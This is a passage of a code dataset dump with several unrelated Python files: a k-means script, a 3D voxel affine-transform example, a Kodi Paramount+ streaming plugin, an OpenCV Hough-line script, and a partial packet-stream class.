1):\n\trandom1=random.randrange(0,(rows-1))\n\tmean[p] = data[random1]\n\n#classifying points\n\ncluster = {}\ndiff = 1\n\nprev = [[0]*cols for x in range(k)]\n\ndist, n , mean_dist =[],[],[]\n\nfor p in range(0, k, 1):\n\tmean_dist.append(0)\n\tdist.append(0.1)\n\tn.append(0.1)\n\n\ntotal_dist =1\nclasses=[]\n\nwhile ((total_dist) > 0):\n\tfor i in range(0,rows, 1):\n\t\tdist =[]\n\n\t\tfor p in range(0, k, 1):\n\t\t\tdist.append(0)\n\t\tfor p in range(0, k, 1):\n\t\t\tfor j in range(0, cols, 1):\n\t\t\t\tdist[p] += ((data[i][j] - mean[p][j])**2)\n\t\tfor p in range(0, k, 1):\n\t\t\tdist[p] = (dist[p])**0.5\n\t\tminimum_dist = 0\n\t\tminimum_dist = min(dist)\n \n\t\tfor p in range(0, k, 1):\n\t\t\tif(dist[p]==minimum_dist):\n\t\t\t\tcluster[i] = p \n\t\t\t\tn[p]+=1 \n\t\t\t\tbreak\n \n # compute means\n\n\tmean = [[0]*cols for x in range(k)]\n\tcol = [] \n\n\tfor i in range(0, rows, 1):\n\t\tfor p in range(0, k, 1):\n \n\t\t\tif(cluster.get(i) == p):\n\t\t\t\tfor j in range(0, cols, 1): \n\t\t\t\t\ttemp = mean[p][j]\n\t\t\t\t\ttemp1 = data[i][j]\n\t\t\t\t\tmean[p][j] = temp + temp1 \n \n\tfor j in range(0, cols, 1):\n\t\tfor i in range(0, k, 1):\n\t\t\tmean[i][j] = mean[i][j]/n[i]\n\n\tclasses = [int(x) for x in n]\n\tn=[0.1]*k \n \n #compute distance\n\n\tmean_dist = []\n\tfor p in range(0, k, 1):\n\t\tmean_dist.append(0)\n\tfor p in range(0, k, 1):\n\t\tfor j in range(0, cols, 1):\n\t\t\tmean_dist[p]+=float((prev[p][j]-mean[p][j])**2)\n\n\t\tmean_dist[p] = (mean_dist[p])**0.5\n \n\tprev=mean\n\ttotal_dist = 0\n\tfor b in range(0,len(mean_dist),1):\n\t\ttotal_dist += mean_dist[b]\n\n#\tprint (\"the distance between means:\",totaldist)\nprint(\" Number of Data points in\",k,\" clusters are\",classes)\n\n#clustering of unclustered data\n#cluster\nfor i in range(0,rows, 1):\n\tprint(cluster[i],i)\n","sub_path":"Assignment8/Assignment8_Pavan_Ghuge.py","file_name":"Assignment8_Pavan_Ghuge.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"23812033","text":"from scipy import ndimage \nimport tensorflow as tf\nfrom spatial_transformer import AffineVolumeTransformer\nimport numpy as np\nimport scipy.misc\nimport binvox_rw\nimport sys\n\ndef read_binvox(f):\n class Model:\n pass\n\n model = Model()\n\n line = f.readline().strip()\n if not line.startswith(b'#binvox'):\n raise IOError('Not a binvox file')\n\n model.dims = list(map(int, f.readline().strip().split(b' ')[1:]))\n model.translate = list(map(float, f.readline().strip().split(b' ')[1:]))\n model.scale = float(f.readline().strip().split(b' ')[1])\n\n _ = f.readline()\n raw_data = np.frombuffer(f.read(), dtype=np.uint8)\n values, counts = raw_data[::2], raw_data[1::2]\n\n # xzy (binvox) -> zyx (tensorflow)\n model.data = np.transpose(np.repeat(values, counts).astype(np.bool).reshape(model.dims), (1,2,0))\n\n # zxy -> zyx (should all be equal, so doesn't matter)\n model.dims = [model.dims[i] for i in [0,2,1]]\n return model\n\ndef write_binvox(model, f):\n f.write(b'#binvox 1\\n')\n f.write(('dim '+' '.join(map(str, [model.dims[i] for i in [0,2,1]]))+'\\n').encode())\n f.write(('translate '+' '.join(map(str, model.translate))+'\\n').encode())\n f.write(('scale'+str(model.scale)+'\\n').encode())\n f.write(b'data\\n')\n\n # zyx (tensorflow) -> xzy (binvox)\n voxels = np.transpose(model.data, (2, 0, 1)).flatten()\n\n # run length encoding\n value = voxels[0]\n count = 0\n\n def dump():\n if sys.version_info[0] < 3:\n # python 2\n 
f.write(chr(value))\n f.write(chr(count))\n else:\n # python 3\n f.write(bytes((value,)))\n f.write(bytes((count,)))\n\n for curval in voxels:\n if curval==value:\n count += 1\n if count==255:\n dump()\n count = 0\n else:\n dump()\n value = curval\n count = 1\n if count > 0:\n dump()\n\n\n# Input image retrieved from:\n# https://raw.githubusercontent.com/skaae/transformer_network/master/cat.jpg\nwith open('data/model.binvox', 'rb') as f:\n model = read_binvox(f)\n\nvol = model.data.copy().astype(np.float32)\npad_size = 12\nvol = np.pad(vol, pad_width=[[pad_size,pad_size], [pad_size,pad_size], [pad_size,pad_size]], mode='constant')\nmodel.dims = (np.array(model.dims) + 2*pad_size).tolist()\n\n# input batch\nbatch_size = 3\nbatch = np.expand_dims(vol, axis=3)\nbatch = np.expand_dims(batch, axis=0)\nbatch = np.tile(batch, [batch_size, 1, 1, 1, 1])\n\n# input placeholder\n# depth, height, width, in_channels\nx = tf.placeholder(tf.float32, [batch_size, vol.shape[0], vol.shape[1], vol.shape[2], 1])\n\noutsize = (int(vol.shape[0]), int(vol.shape[1]), int(vol.shape[2]))\n\n# Affine Transformation Layer\nstl = AffineVolumeTransformer(outsize)\ntheta = tf.placeholder(tf.float32, [batch_size, stl.param_dim])\n\n# Identity transformation parameters\ninitial = np.array([1.0, 0.0, 0.0, 0.0,\n 0.0, 1.0, 0.0, 0.0,\n 0.0, 0.0, 1.0, 0.0 ]).astype('float32')\ninitial = np.reshape(initial, [1, stl.param_dim])\n\n# x-axis-rot, y-axis-rot, z-axis-rot\ndef transmat(phi, theta, psi, shiftmat=None):\n batch_size = phi.shape[0]\n assert batch_size==theta.shape[0] and batch_size==psi.shape[0], 'must have same number of angles for x,y and z axii'\n assert phi.ndim==1 and theta.ndim==1 and psi.ndim==1, 'must be 1 dimensional array'\n\n if shiftmat is None:\n shiftmat = np.zeros([batch_size,3,1])\n\n rotmat = np.zeros([batch_size, 3,3])\n rotmat[:,0,0] = np.cos(theta)*np.cos(psi)\n rotmat[:,0,1] = np.cos(phi)*np.sin(psi) + np.sin(phi)*np.sin(theta)*np.cos(psi)\n rotmat[:,0,2] = np.sin(phi)*np.sin(psi) - np.cos(phi)*np.sin(theta)*np.cos(psi)\n rotmat[:,1,0] = -np.cos(theta)*np.sin(psi)\n rotmat[:,1,1] = np.cos(phi)*np.cos(psi) - np.sin(phi)*np.sin(theta)*np.sin(psi)\n rotmat[:,1,2] = np.sin(phi)*np.cos(psi) + np.cos(phi)*np.sin(theta)*np.sin(psi)\n rotmat[:,2,0] = np.sin(theta)\n rotmat[:,2,1] = -np.sin(phi)*np.cos(theta)\n rotmat[:,2,2] = np.cos(phi)*np.cos(theta)\n\n transmat = np.concatenate([rotmat, shiftmat],2)\n return np.reshape(transmat, [batch_size, -1]).astype(np.float32)\n\n\n# Run session\nwith tf.Session(config=tf.ConfigProto(device_count={'GPU':0})) as sess:\n with tf.device(\"/cpu:0\"):\n with tf.variable_scope('spatial_transformer') as scope:\n random_angles = np.pi*(2*(np.random.rand(batch_size,3)-0.5))\n shifts = (np.random.rand(batch_size,3,1)-0.5)\n theta_random = transmat(random_angles[:,0], random_angles[:,1], random_angles[:,2], shifts)\n\n transformed = stl.transform(x, theta)\n\n sess.run(tf.global_variables_initializer())\n x_random = sess.run(transformed, feed_dict={x: batch, theta: theta_random})\n\n\nclass Model:\n pass\nmodel = Model()\n\nfor i in range(batch_size):\n cur_vol = x_random[i,:,:,:,0]>0.5 # binary\n\n model.dims = list(cur_vol.shape)\n model.data = cur_vol\n model.translate = [0,0,0]\n model.scale = 1.0\n\n #print(model.dims)\n #print(model.translate)\n #print(model.scale)\n #print(model.axis_order)\n\n with open('model_' + str(i) + 'random.binvox', 'wb') as f:\n write_binvox(model, 
f)\n\n\n","sub_path":"example_3daffine.py","file_name":"example_3daffine.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"13258295","text":"import time\nimport codecs\nfrom xml.sax.saxutils import escape\nfrom xml.dom.minidom import parseString\n\nimport arrow\nfrom kodi_six import xbmc\n\nfrom slyguy import plugin, gui, settings, userdata, signals, inputstream\nfrom slyguy.exceptions import PluginError\n\nfrom .api import API\nfrom .language import _\nfrom .constants import *\n\napi = API()\nconfig = Config()\n\n@signals.on(signals.BEFORE_DISPATCH)\ndef before_dispatch():\n config.load()\n api.new_session(config)\n plugin.logged_in = api.logged_in\n\n@plugin.route('')\ndef home(**kwargs):\n folder = plugin.Folder(cacheToDisc=False)\n\n if not api.logged_in:\n folder.add_item(label=_(_.LOGIN, _bold=True), path=plugin.url_for(login))\n else:\n if config.has_featured:\n folder.add_item(label=_(_.FEATURED, _bold=True), path=plugin.url_for(featured))\n\n folder.add_item(label=_(_.SHOWS, _bold=True), path=plugin.url_for(shows))\n folder.add_item(label=_(_.MOVIES, _bold=True), path=plugin.url_for(movies))\n\n if config.has_live_tv:\n folder.add_item(label=_(_.LIVE_TV, _bold=True), path=plugin.url_for(live_tv))\n\n # folder.add_item(label=_(_.BRANDS, _bold=True), path=plugin.url_for(brands))\n # folder.add_item(label=_(_.NEWS, _bold=True), path=plugin.url_for(news))\n folder.add_item(label=_(_.SEARCH, _bold=True), path=plugin.url_for(search))\n\n if settings.getBool('bookmarks', True):\n folder.add_item(label=_(_.BOOKMARKS, _bold=True), path=plugin.url_for(plugin.ROUTE_BOOKMARKS), bookmark=False)\n\n folder.add_item(label=_.SELECT_PROFILE, path=plugin.url_for(select_profile), art={'thumb': config.image(userdata.get('profile_img'))}, info={'plot': userdata.get('profile_name')}, _kiosk=False, bookmark=False)\n folder.add_item(label=_.LOGOUT, path=plugin.url_for(logout), _kiosk=False, bookmark=False)\n\n folder.add_item(label=_.SETTINGS, path=plugin.url_for(plugin.ROUTE_SETTINGS), _kiosk=False, bookmark=False)\n\n return folder\n\n@plugin.route()\ndef featured(slug=None, **kwargs):\n folder = plugin.Folder(_.FEATURED)\n\n for row in api.featured():\n if row['model'] not in ('show', 'movie'):\n continue\n\n if slug is None:\n folder.add_item(\n label = row['title'],\n path = plugin.url_for(featured, slug=row['apiParams']['name']),\n )\n continue\n\n if slug != row['apiParams']['name']:\n continue\n\n for row in api.carousel(row['apiBaseUrl'], params=row['apiParams']):\n if row.get('showId'):\n folder.add_item(\n label = row['showTitle'],\n info = {\n 'plot': row['about'],\n 'mediatype': 'tvshow',\n },\n art = {'thumb': config.image(row['showAssets']['filepath_show_browse_poster']), 'fanart': config.image(row['showAssets']['filepath_brand_hero'], 'w1920-q80')},\n path = plugin.url_for(show, show_id=row['showId']),\n )\n\n elif row.get('movieContent'):\n data = row['movieContent']\n folder.add_item(\n label = data['label'].strip() or data['title'].strip(),\n info = {\n 'plot': data.get('shortDescription', data['description']),\n 'aired': data['_airDateISO'],\n 'dateadded': data['_pubDateISO'],\n 'genre': data['genre'],\n 'duration': data['duration'],\n 'mediatype': 'movie',\n 'trailer': plugin.url_for(play, video_id=row['trailerContentId']) if row.get('trailerContentId') else None,\n },\n art = {'thumb': _get_thumb(data['thumbnailSet']), 'fanart': _get_thumb(data['thumbnailSet'], 'Thumbnail')},\n path = 
plugin.url_for(play, video_id=data['contentId']),\n playable = True,\n )\n\n break\n\n return folder\n\n@plugin.route()\ndef movies(genre=None, title=None, page=1, **kwargs):\n folder = plugin.Folder(title or _.MOVIES)\n page = int(page)\n num_results = 50\n\n if genre is None:\n folder.add_item(\n label = _.POPULAR,\n path = plugin.url_for(movies, genre='popular', title=_.POPULAR),\n )\n\n folder.add_item(\n label = _.A_Z,\n path = plugin.url_for(movies, genre='', title=_.A_Z),\n )\n\n for row in api.movie_genres():\n if row['slug'] in ('popular', 'a-z'):\n continue\n\n folder.add_item(\n label = row['title'],\n path = plugin.url_for(movies, genre=row['slug'], title=row['title']),\n )\n\n return folder\n\n if genre == 'popular':\n data = api.trending_movies()\n data['movies'] = [x['content'] for x in data['trending'] if x['content_type'] == 'movie']\n data['numFound'] = len(data['movies'])\n else:\n data = api.movies(genre=genre, num_results=num_results, page=page)\n\n folder.title += ' ({})'.format(data['numFound'])\n\n for row in data['movies']:\n data = row['movieContent']\n folder.add_item(\n label = data['label'].strip() or data['title'].strip(),\n info = {\n 'plot': data.get('shortDescription', data['description']),\n 'aired': data['_airDateISO'],\n 'dateadded': data['_pubDateISO'],\n 'genre': data['genre'],\n 'duration': data['duration'],\n 'mediatype': 'movie',\n 'trailer': plugin.url_for(play, video_id=row['movie_trailer_id']) if row.get('movie_trailer_id') else None,\n },\n art = {'thumb': _get_thumb(data['thumbnailSet']), 'fanart': _get_thumb(data['thumbnailSet'], 'Thumbnail')},\n path = plugin.url_for(play, video_id=data['contentId']),\n playable = True,\n )\n\n if len(folder.items) == num_results:\n folder.add_item(\n label = _(_.NEXT_PAGE, page=page+1),\n path = plugin.url_for(movies, genre=genre, title=title, page=page+1),\n specialsort = 'bottom',\n )\n\n return folder\n\n@plugin.route()\ndef shows(group_id=None, **kwargs):\n if group_id is None:\n folder = plugin.Folder(_.SHOWS)\n\n for row in api.show_groups():\n folder.add_item(\n label = row['title'],\n path = plugin.url_for(shows, group_id=row['id']),\n )\n\n return folder\n\n data = api.show_group(group_id)\n\n folder = plugin.Folder(data['title'] + ' ({})'.format(data['totalShowGroupCount']))\n items = _process_shows(data['showGroupItems'])\n folder.add_items(items)\n\n return folder\n\ndef _process_shows(rows):\n items = []\n\n for row in rows:\n plot = _(_.EPISODE_COUNT, count=row['episodeVideoCount']['totalEpisodes'])\n # if row['episodeVideoCount']['totalClips']:\n # plot += '\\n'+ _(_.CLIPS_COUNT, count=row['episodeVideoCount']['totalClips'])\n\n item = plugin.Item(\n label = row['title'],\n info = {\n 'genre': row['category'],\n 'mediatype': 'tvshow',\n 'plot': plot,\n },\n art = {'thumb': config.image(row['showAssets']['filepath_show_browse_poster']), 'fanart': config.image(row['showAssets']['filepath_brand_hero'], 'w1920-q80')},\n path = plugin.url_for(show, show_id=row['showId']),\n )\n\n items.append(item)\n\n return items\n\n@plugin.route()\ndef show(show_id, **kwargs):\n show = api.show(show_id)\n\n folder = plugin.Folder(show['show']['results'][0]['title'], thumb=config.image(show['showAssets']['filepath_show_browse_poster']), fanart=config.image(show['showAssets']['filepath_brand_hero'], 'w1920-q80'))\n\n plot = show['show']['results'][0]['about'] + '\\n\\n'\n\n clip_count = 0\n for row in sorted(api.seasons(show_id), key=lambda x: int(x['seasonNum'])):\n clip_count += row['clipsCount']\n if not 
row['totalCount']:\n continue\n\n folder.add_item(\n label = _(_.SEASON, season=row['seasonNum']),\n info = {\n 'plot': plot + _(_.EPISODE_COUNT, count=row['totalCount']),\n 'mediatype': 'season',\n 'tvshowtitle': show['show']['results'][0]['title'],\n },\n path = plugin.url_for(season, show_id=show_id, season=row['seasonNum']),\n )\n\n # if clip_count:\n # folder.add_item(\n # label = _.CLIPS,\n # info = {\n # 'plot': plot + _(_.CLIPS_COUNT, count=clip_count),\n # }\n # )\n\n return folder\n\n@plugin.route()\ndef season(show_id, season, **kwargs):\n show = api.show(show_id)\n\n folder = plugin.Folder(show['show']['results'][0]['title'], fanart=config.image(show['showAssets']['filepath_brand_hero'], 'w1920-q80'))\n\n for row in api.episodes(show_id, season):\n folder.add_item(\n label = row['label'].strip() or row['title'].strip(),\n info = {\n 'aired': row['_airDateISO'],\n 'dateadded': row['_pubDateISO'],\n 'plot': row['shortDescription'],\n 'season': row['seasonNum'],\n 'episode': row['episodeNum'],\n 'duration': row['duration'],\n 'genre': row['topLevelCategory'],\n 'mediatype': 'episode',\n 'tvshowtitle': show['show']['results'][0]['title'],\n },\n art = {'thumb': config.thumbnail(row['thumbnail'])},\n path = plugin.url_for(play, video_id=row['contentId']),\n playable = True,\n )\n\n return folder\n\n@plugin.route()\ndef live_tv(**kwargs):\n folder = plugin.Folder(_.LIVE_TV)\n\n now = arrow.utcnow()\n\n for row in api.live_channels():\n if not row['currentListing'] or (not row['dma'] and not row['currentListing'][-1]['contentCANVideo'].get('liveStreamingUrl')):\n continue\n\n plot = u''\n for listing in row['currentListing']:\n start = arrow.get(listing['startTimestamp'])\n end = arrow.get(listing['endTimestamp'])\n if (now > start and now < end) or start > now:\n plot += u'[{} - {}]\\n{}\\n'.format(start.to('local').format('h:mma'), end.to('local').format('h:mma'), listing['title'])\n\n folder.add_item(\n label = row['channelName'],\n info = {\n 'plot': plot.strip('\\n'),\n },\n art = {'thumb': config.image(row['filePathLogoSelected'])},\n path = plugin.url_for(play_channel, slug=row['slug'], _is_live=True),\n playable = True,\n )\n\n return folder\n\n@plugin.route()\ndef search(query=None, **kwargs):\n if not query:\n query = gui.input(_.SEARCH, default=userdata.get('search', '')).strip()\n if not query:\n return\n\n userdata.set('search', query)\n\n folder = plugin.Folder(_(_.SEARCH_FOR, query=query))\n\n for row in api.search(query):\n if row['term_type'] == 'show':\n folder.add_item(\n label = row['title'],\n info = {\n 'mediatype': 'tvshow',\n },\n art = {'thumb': config.image(row['showAssets']['filepath_show_browse_poster']), 'fanart': config.image(row['showAssets']['filepath_brand_hero'], 'w1920-q80')},\n path = plugin.url_for(show, show_id=row['show_id']),\n )\n\n elif row['term_type'] == 'movie':\n data = row['videoList']['itemList'][0]\n\n folder.add_item(\n label = data['label'].strip() or data['title'].strip(),\n info = {\n 'plot': data.get('shortDescription', data['description']),\n 'aired': str(arrow.get(data['airDate'])),\n 'duration': data['duration'],\n 'mediatype': 'movie',\n 'trailer': plugin.url_for(play, video_id=row['movie_trailer_id']) if row.get('movie_trailer_id') else None,\n },\n art = {'thumb': _get_thumb(data['thumbnailSet']), 'fanart': _get_thumb(data['thumbnailSet'], 'Thumbnail')},\n path = plugin.url_for(play, video_id=data['contentId']),\n playable = True,\n )\n\n return folder\n\n@plugin.route()\ndef login(**kwargs):\n if config.has_device_link and 
gui.yes_no(_.LOGIN_WITH, yeslabel=_.DEVICE_LINK, nolabel=_.EMAIL_PASSWORD):\n result = _device_link()\n else:\n result = _email_password()\n\n if not result:\n return\n\n _select_profile()\n gui.refresh()\n\ndef _email_password():\n username = gui.input(_.ASK_USERNAME, default=userdata.get('username', '')).strip()\n if not username:\n return\n\n userdata.set('username', username)\n\n password = gui.input(_.ASK_PASSWORD, hide_input=True).strip()\n if not password:\n return\n\n api.login(username=username, password=password)\n\n return True\n\ndef _device_link():\n start = time.time()\n data = api.device_code()\n monitor = xbmc.Monitor()\n\n poll_time = int(data['retryInterval']/1000)\n max_time = int(data['retryDuration']/1000)\n device_token = data['deviceToken']\n code = data['activationCode']\n\n with gui.progress(_(_.DEVICE_LINK_STEPS, url=config.device_link_url, code=code), heading=_.DEVICE_LINK) as progress:\n while (time.time() - start) < max_time:\n for i in range(poll_time):\n if progress.iscanceled() or monitor.waitForAbort(1):\n return\n\n progress.update(int(((time.time() - start) / max_time) * 100))\n\n result = api.device_login(code, device_token)\n if result:\n return True\n\n elif result == -1:\n return False\n\n@plugin.route()\ndef select_profile(**kwargs):\n _select_profile()\n gui.refresh()\n\ndef _select_profile():\n profiles = api.user()['accountProfiles']\n\n values = []\n options = []\n default = -1\n for index, profile in enumerate(profiles):\n values.append(profile['id'])\n options.append(plugin.Item(label=profile['name'], art={'thumb': config.image(profile['profilePicPath'])}))\n if profile['id'] == userdata.get('profile_id'):\n default = index\n\n index = gui.select(_.SELECT_PROFILE, options=options, preselect=default, useDetails=True)\n if index < 0:\n return\n\n api.set_profile(values[index])\n gui.notification(_.PROFILE_ACTIVATED, heading=userdata.get('profile_name'), icon=config.image(userdata.get('profile_img')))\n\ndef _get_thumb(thumbs, _type='PosterArt'):\n if not thumbs:\n return None\n\n for row in thumbs:\n if row['assetType'] == _type:\n return config.thumbnail(row['url'])\n\n return None\n\ndef _parse_item(row):\n if row['mediaType'] == 'Standalone':\n row['mediaType'] = 'Movie'\n elif row['mediaType'] == 'Clip':\n row['mediaType'] = 'Trailer'\n\n if row['mediaType'] in ('Movie', 'Trailer'):\n return plugin.Item(\n label = row['title'],\n info = {\n 'aired': row['_airDateISO'],\n 'dateadded': row['_pubDateISO'],\n 'genre': row['genre'],\n 'plot': row['shortDescription'],\n 'duration': row['duration'],\n 'mediatype': 'movie' if row['mediaType'] == 'Movie' else 'video',\n },\n art = {'thumb': _get_thumb(row['thumbnailSet'], 'Thumbnail') if row['mediaType'] == 'Trailer' else _get_thumb(row['thumbnailSet'])},\n )\n\n return plugin.Item()\n\n@plugin.route()\n@plugin.plugin_callback()\ndef mpd_request(_data, _data_path, **kwargs):\n root = parseString(_data)\n\n dolby_vison = settings.getBool('dolby_vision', False)\n h265 = settings.getBool('h265', False)\n enable_4k = settings.getBool('4k_enabled', True)\n enable_ac3 = settings.getBool('ac3_enabled', False)\n enable_ec3 = settings.getBool('ec3_enabled', False)\n enable_accessibility = settings.getBool('accessibility_enabled', False)\n\n for elem in root.getElementsByTagName('Representation'):\n parent = elem.parentNode\n codecs = elem.getAttribute('codecs').lower()\n height = int(elem.getAttribute('height') or 0)\n width = int(elem.getAttribute('width') or 0)\n\n if not dolby_vison and 
(codecs.startswith('dvhe') or codecs.startswith('dvh1')):\n parent.removeChild(elem)\n\n elif not h265 and (codecs.startswith('hvc') or codecs.startswith('hev')):\n parent.removeChild(elem)\n\n elif not enable_4k and (height > 1080 or width > 1920):\n parent.removeChild(elem)\n\n elif not enable_ac3 and codecs == 'ac-3':\n parent.removeChild(elem)\n\n elif not enable_ec3 and codecs == 'ec-3':\n parent.removeChild(elem)\n\n for adap_set in root.getElementsByTagName('AdaptationSet'):\n if not adap_set.getElementsByTagName('Representation') or \\\n (not enable_accessibility and adap_set.getElementsByTagName('Accessibility')):\n adap_set.parentNode.removeChild(adap_set)\n\n with open(_data_path, 'wb') as f:\n f.write(root.toprettyxml(encoding='utf-8'))\n\n return _data_path\n\n@plugin.route()\n@plugin.login_required()\ndef play(video_id, **kwargs):\n url, license_url, token, data = api.play(video_id)\n\n item = _parse_item(data)\n item.proxy_data['manifest_middleware'] = plugin.url_for(mpd_request)\n\n headers = {\n 'authorization': 'Bearer {}'.format(token),\n }\n\n item.update(\n path = url,\n headers = headers,\n inputstream = inputstream.Widevine(\n license_key = license_url,\n ),\n )\n\n return item\n\n@plugin.route()\n@plugin.login_required()\ndef play_channel(slug, **kwargs):\n channels = api.live_channels()\n\n for row in channels:\n if row['slug'] == slug:\n if row['dma']:\n play_path = row['dma']['playback_url']\n elif row['currentListing']:\n play_path = row['currentListing'][0]['contentCANVideo']['liveStreamingUrl']\n else:\n raise Exception('No url found for this channel')\n\n return plugin.Item(\n label = row['channelName'],\n info = {\n 'plot': row['description'],\n },\n art = {'thumb': config.image(row['filePathLogoSelected'])},\n path = play_path,\n inputstream = inputstream.HLS(live=True),\n )\n\n raise Exception('Unable to find that channel')\n\n@plugin.route()\ndef logout(**kwargs):\n if not gui.yes_no(_.LOGOUT_YES_NO):\n return\n\n api.logout()\n gui.refresh()\n\n@plugin.route()\n@plugin.merge()\ndef playlist(output, **kwargs):\n with codecs.open(output, 'w', encoding='utf8') as f:\n f.write(u'#EXTM3U\\n')\n\n for row in api.live_channels():\n if not row['currentListing'] or len(row['currentListing']) > 1:\n continue\n\n f.write(u'#EXTINF:-1 tvg-id=\"{id}\" tvg-name=\"{name}\" tvg-logo=\"{logo}\",{name}\\n{path}\\n'.format(\n id=row['slug'], name=row['channelName'], logo=config.image(row['filePathLogoSelected']), path=plugin.url_for(play_channel, slug=row['slug'], _is_live=True)))\n\n@plugin.route()\n@plugin.merge()\ndef epg(output, **kwargs):\n channels = api.live_channels()\n now = arrow.now()\n until = now.shift(days=settings.getInt('epg_days', 3))\n\n with codecs.open(output, 'w', encoding='utf8') as f:\n f.write(u'')\n\n for channel in api.live_channels():\n if not channel['currentListing'] or (not channel['dma'] and not channel['currentListing'][-1]['contentCANVideo'].get('liveStreamingUrl')):\n continue\n\n f.write(u''.format(id=channel['slug']))\n\n page = 1\n stop = now\n while stop < until:\n rows = api.epg(channel['slug'], rows=100, page=page)\n page += 1\n if not rows:\n break\n\n for row in rows:\n start = arrow.get(row['startTimestamp'])\n stop = arrow.get(row['endTimestamp'])\n\n icon = u''.format(config.image(row['filePathThumb'])) if row['filePathThumb'] else ''\n desc = u'{}'.format(escape(row['description'])) if row['description'] else ''\n\n f.write(u'{title}{desc}{icon}'.format(\n id=channel['slug'], start=start.format('YYYYMMDDHHmmss Z'), 
stop=stop.format('YYYYMMDDHHmmss Z'), title=escape(row['title']), desc=desc, icon=icon,\n ))\n\n f.write(u'')\n","sub_path":"slyguy.paramount.plus/resources/lib/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":21066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"651446311","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('img_laplacian.jpg',0)\nimg2 = cv2.imread('referencia.jpg')\nkernel = np.ones((1,1),np.uint8)\n\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\nblur = cv2.GaussianBlur(opening,(3,3),0)\n\nret3,th4 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU) \nlaplacian = cv2.Laplacian(th4,cv2.CV_8UC1)\ncst = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)\nminLineLength = 150\nmaxLineGap = 30\nlines = cv2.HoughLinesP(laplacian,1,np.pi/180,100,minLineLength,maxLineGap)\nfor line in lines: \n for x1,y1,x2,y2 in line:\n cv2.line(img2,(x1 + 1000,y1),(x2 - 5000,y2),(0,0,255),1)\n\ncv2.imwrite('linesDetected_laplacian.jpg',img2)","sub_path":"OpenCv_algoritmos/Hough-Transform/plant+lineDetect/houghTransform_laplacian.py","file_name":"houghTransform_laplacian.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"164509569","text":"from helpFunc import *\nimport struct,uuid\n\nclass streamBase():\n def __init__(self,upper,rate,pushAhead,packLimit,isServer):\n self.upper = upper\n self.staTime = 0\n self.sendPackMap = {}\n self.recPackMap = {}\n self.sendSelfPos = 0\n self.sendPeerPos = 0\n self.recPos = 0\n self.sendStatusRate = rate\n self.notRecInfo = {}\n self.peerNotRecInfo = {} \n self.sockMap = {}\n self.statusGapTime = float('inf')\n self.pushAhead = pushAhead\n l = circleRange(0,self.pushAhead)\n for i in l:\n self.notRecInfo[i]=0\n self.newPeerTime = -float('inf')\n self.peerMyTime = -float('inf')\n self.hasStart = False\n self.maxSend = 1\n self.slope = 1\n self.packLimit = packLimit\n self.updatedTime = getRunningTime()\n self.calStaNum = 0\n self.waitingTime = 0\n self.rRaw = self.wRaw = self.rNet = self.wNet = 0\n self.totalRec = self.blankRec = self.totalSend = self.blankSend = self.statusSend = self.statusRev = 0 \n self.isServer = isServer\n self.maxSendL = {}\n self.maxRec = {}\n self.peerMaxSend = {}\n self.peerMaxRec = {}\n \n def getLog(self):\n s = '[raw,net](r/w) %s %s %s %s [n/s/t](r/w) %s %s %s %s %s %s [rate,slope,max] %2.2f %s %s'%\\\n (int(self.rRaw/1024),int(self.wRaw/1024),int(self.rNet/1024),int(self.wNet/1024),\\\n self.blankRec,self.blankSend,self.statusRev,self.statusSend,self.totalRec,self.totalSend,\\\n self.sendStatusRate,self.slope,self.maxSend)\n return s\n \n def dealStatusBack(self,re):\n self.updatedTime = getRunningTime()\n s = structWrapper(re)\n s.readByte()\n peerTime = s.readDouble()\n if peerTimecon_streamBufferSize:\n break\n s .append( self.recPackMap[one])\n bufferL += len(self.recPackMap[one])\n del self.recPackMap[one]\n self.recPos = circleAddOne(one)\n self.notRecInfo[circleAdd(one,self.pushAhead)] = 0\n \n if s or self.upper.readBuffer:\n ss = b''.join(s) \n self.rNet += len(ss)\n self.upper.readBuffer += ss \n self.upper.ioloop.add_callback(self.rCallback) \n self.upper.readLock.release() \n \n def write(self):\n if not self.hasStart:\n return \n \n self.upper.writeLock.acquire() \n lB = len(self.upper.writeBuffer)\n newPos = 0 \n while True:\n if lB == 0:\n break\n if 
circleBig(circleAdd(self.sendPeerPos,self.pushAhead),self.sendSelfPos) == self.sendSelfPos: \n break \n s1 = self.upper.writeBuffer[newPos:newPos+self.packLimit]\n\n newPos += self.packLimit\n self.sendPackMap[self.sendSelfPos] = {'sendRecording':{},'con':s1}\n self.wNet += len(s1)\n self.sendSelfPos = circleAddOne(self.sendSelfPos)\n if newPos>=lB:\n break\n \n self.upper.writeBuffer = self.upper.writeBuffer[newPos:]\n if not self.upper.writeBuffer:\n self.upper.ioloop.add_callback(self.wCallback) \n self.upper.writeLock.release() \n \n def get_data_to_send(self,n):\n self.totalSend += n\n self.clearRecording()\n if not self.hasStart:\n statusNum = n\n else:\n self.calStaNum += n\n statusNum = int(self.calStaNum*self.sendStatusRate)\n if statusNum>n:\n statusNum=n\n self.calStaNum-=statusNum/self.sendStatusRate\n st = self.getOneStatus()\n l = self.findNPack(n-statusNum)\n self.statusSend += statusNum\n ret = []\n for i in range(statusNum):\n ret.append(st)\n ret = ret+l\n for i in range(n-statusNum-len(l)):\n re = struct.pack('b',2)\n ret.append(re)\n self.blankSend += 1\n return ret\n\n def getOneStatus(self):\n re = struct.pack('b',0)\n re += struct.pack('d',getRunningTime())\n re += struct.pack('d',self.newPeerTime)\n re += struct.pack('d',self.sendStatusRate)\n re += struct.pack('d',self.slope)\n re += struct.pack('d',self.maxSend)\n re += struct.pack('d',self.waitingTime) \n re += struct.pack('H',getPackStaBigV(self.maxSendL)) \n re += struct.pack('H',getPackStaBigV(self.maxRec)) \n re += struct.pack('H',self.recPos) \n co = 0\n ss = '' \n l = 